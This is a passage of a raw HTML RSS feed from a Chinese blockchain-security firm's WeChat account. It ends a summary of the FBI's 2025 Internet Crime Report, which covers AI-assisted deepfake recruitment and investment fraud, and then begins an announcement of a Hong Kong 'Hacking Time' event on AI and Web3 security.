dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">招聘诈骗：在远程面试中使用语音伪造或深度伪造技术，以获取企业内部访问权限，损失接近 1300 万美元；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资诈骗：借助 AI 批量生成个性化沟通内容，并伪造名人或权威背书的视频与语音，相关损失超过 6.32 亿美元。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">整体来看，AI 正在降低诈骗门槛，并显著增强诈骗的规模化与伪装能力。</span></span></p><h1 dir="ltr" style="line-height:1.38;margin-top:20pt;margin-bottom:6pt;"><span style="white-space:pre-wrap;font-size:20pt;font-family:Roboto,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 24px;">总结</span></span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">FBI 发布的《2025 年互联网犯罪报告》进一步揭示了当前网络犯罪生态的深层演变：一方面，诈骗规模持续攀升，加密货币仍是资金转移与洗钱的重要载体；另一方面，犯罪手法正从传统“机会型欺诈”向“精准化、工业化运作”加速转变，尤其是在老龄群体中的高强度渗透，以及“追回骗局”等二次诈骗的蔓延，反映出攻击者对受害者心理与行为模式的深度利用。同时，人工智能技术的引入，正在显著降低诈骗门槛并放大攻击效率，使网络诈骗逐步演变为具备自动化与规模化特征的复杂威胁体系。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">尽管执法机构在资金拦截与跨国协作方面已取得阶段性成果，但从整体损失规模与增长趋势来看，风险态势依然严峻。对于普通用户而言，建立基本的风险识别能力与反诈骗意识，已成为数字时代的“必修课”；而对于行业参与者及监管机构来说，如何在技术层面提升对资金流向、行为模式与异常信号的综合识别能力，并加强跨区域协同治理，将成为未来应对新型网络犯罪的关键所在。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">往期内容：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247502042&amp;idx=1&amp;sn=21fec62cc573ae6129a92e2571e17a5b&amp;scene=21#wechat_redirect" textvalue="《解读｜FBI 发布《2024 年加密货币欺诈报告》" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;"> 解读｜FBI 发布《2024 年加密货币欺诈报告》</span></a></span></p></b></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504728&amp;idx=1&amp;sn=2e9d14cd251484f86669e24458daafb6&amp;scene=21#wechat_redirect" textvalue="慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74&amp;scene=21#wechat_redirect" textvalue="慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504616&amp;idx=1&amp;sn=95677483334baedb3127bdc0911fa2f8&amp;scene=21#wechat_redirect" textvalue="慢雾：如何评估加密反洗钱工具的有效性" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：如何评估加密反洗钱工具的有效性</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504607&amp;idx=1&amp;sn=49e70d092b5e2e4d7278e85d822643f8&amp;scene=21#wechat_redirect" textvalue="活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛" data-itemshowtype="0" linktype="text" data-linktype="2">活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages js_insertlocalimg wxw-img" data-aistatus="1" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="1973" data-fileid="100009827" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81074fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FqsQ2ibEw5pLbEP8f4tadFenoLauzHpicWdWbVap3aia38LUGPflBho9ibDHXjoG5fecGJSaYa4S4zYdoicXibSmjv9tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://www.ic3.gov/AnnualReport/Reports/2025_IC3Report.pdf">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=00a51713&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504729%26idx%3D1%26sn%3Daa1c7332bba7ac7bbe4f74220e2322e6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 16 Apr 2026 11:29:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504728&amp;idx=1&amp;sn=2e9d14cd251484f86669e24458daafb6</link>
      <description>期待 4 月 21 日 14:00-17:00 与您在香港蔡氏大厦相聚，共探 AI × Web3 安全与合规新边界！</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-04-15 16:24</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=b96cbeb5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCKoMWb4LIJxT5PMkfx7wWG7SbaMU3QdGpjHUGRAibTSv2uCOibkl6fUM9TTrZNsBYgMyNujUG9qiaicXicTibLCkGz3ia1StD3LTddysY%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>期待 4 月 21 日 14:00-17:00 与您在香港蔡氏大厦相聚，共探 AI × Web3 安全与合规新边界！</p>
  <p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Hacking Time 是慢雾(SlowMist) 自 2019 年创办的经典技术交流活动，始终以技术驱动为核心，汇聚全球顶尖安全研究员、开发者与行业专家，围绕链上攻击、智能合约安全、链上分析及合规治理等 Web3 安全核心议题展开深度交流。历经多年沉淀与迭代，该活动已从单一技术分享平台，发展为连接安全研究与监管视角的重要交流节点，成为 Web3 安全领域中极具代表性的标杆活动。</span></span></b></p><div><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 4 月，紧随香港 Web3 嘉年华的脚步，</span></span><b data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;docs-internal-guid-153f5751-7fff-d8f0-f7cb-408add474304&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">Hacking Time 再次</span></span></b><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">回归，共同探讨 AI 与 Web3 碰撞下的安全新边界。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100021079" data-ratio="0.5625" data-s="300,640" type="block" data-type="jpeg" data-w="1920" src="https://wechat2rss.xlab.app/img-proxy/?k=2c1ef6d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKsRvj1SWXuibLmMnckkib9hbb13ZibumD3fCMhqWqD2Niao607ov59Q1llYZ0TbaCto43U8IVdLH9aqhvoLwRic1ibcdPQarEWa7MRE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 24px;font-weight: bold;">活动详情</span></span></p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span><span textstyle="" style="font-weight: normal;">4 月 21 日 14:00~17:00</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span><span textstyle="" style="font-weight: normal;">香港蔡氏大厦</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p><b style="font-weight:normal;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;docs-internal-guid-0b5424bd-7fff-3f32-0b6a-66c5277d4278&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">活动主题</span></span></p></b></p></b></b></p><p data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;docs-internal-guid-0b5424bd-7fff-3f32-0b6a-66c5277d4278&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次 Hacking Time 将以「 Security for AI &amp; Crypto, AI for Security」为主题，</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">围绕 AI 与 Web3 融合背景下新型攻击范式、安全与合规协同机制、实战防御策略等核心议题，展开多个</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主题分享与圆桌讨论。</span></span></p><p data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 